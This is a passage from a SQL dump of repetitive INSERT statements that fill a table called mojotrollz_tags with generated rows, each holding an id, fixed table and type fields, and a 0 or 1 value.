`comment`) VALUES (166, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (167, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (168, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (170, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (171, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (172, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (173, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (174, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (175, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (177, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (182, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (183, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (185, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (186, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (187, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (188, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (189, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (190, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (191, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (192, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (193, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (194, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (195, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (196, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (197, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (198, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (200, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (201, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (202, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (203, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (204, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (205, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (206, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (207, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (208, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (209, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (210, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (211, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (212, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (213, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (214, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (215, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (216, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (217, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (218, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (219, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (220, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (221, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (222, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (223, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (224, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (226, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (227, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (228, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (229, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (231, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (232, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (233, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (234, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (235, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (237, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (238, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (239, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (240, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (243, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (244, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (245, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (246, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (247, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (250, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (251, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (252, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (253, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (255, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (257, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (258, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (261, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (262, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (263, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (264, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (265, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (266, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (267, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (268, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (269, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (270, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (271, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (272, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (273, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (274, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (275, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (276, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (277, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (278, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (279, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (280, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (281, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (282, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (287, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (288, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (289, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (290, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (291, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (293, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (294, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (295, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (296, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (297, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (298, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (299, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (301, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (302, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (303, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (304, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (305, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (306, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (307, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (308, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (309, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (310, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (312, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (313, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (314, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (315, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (317, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (318, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (319, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (320, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (321, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (322, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (323, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (325, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (330, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (331, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (332, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (333, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (334, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (335, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (336, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (338, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (339, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (340, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (341, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (342, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (343, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (344, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (345, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (346, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (348, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (349, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (350, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (353, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (354, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (355, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (356, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (357, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (358, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (359, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (360, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (362, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (363, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (364, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (365, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (366, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (367, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (368, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (369, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (370, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (371, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (372, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (374, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (375, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (376, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (377, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (378, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (379, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (380, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (381, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (382, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (383, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (384, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (385, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (386, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (387, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (388, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (389, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (391, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (392, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (393, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (394, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (395, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (396, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (397, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (399, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (400, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (401, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (404, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (405, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (407, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (408, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (409, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (411, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (412, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (413, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (414, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (415, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (416, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (418, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (419, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (420, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (421, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (422, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (423, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (424, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (425, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (426, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (427, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (428, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (429, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (430, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (432, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (433, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (434, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (435, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (436, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (437, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (438, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (440, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (441, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (442, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (443, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (444, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (445, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (446, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (447, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (448, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (449, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (450, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (451, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 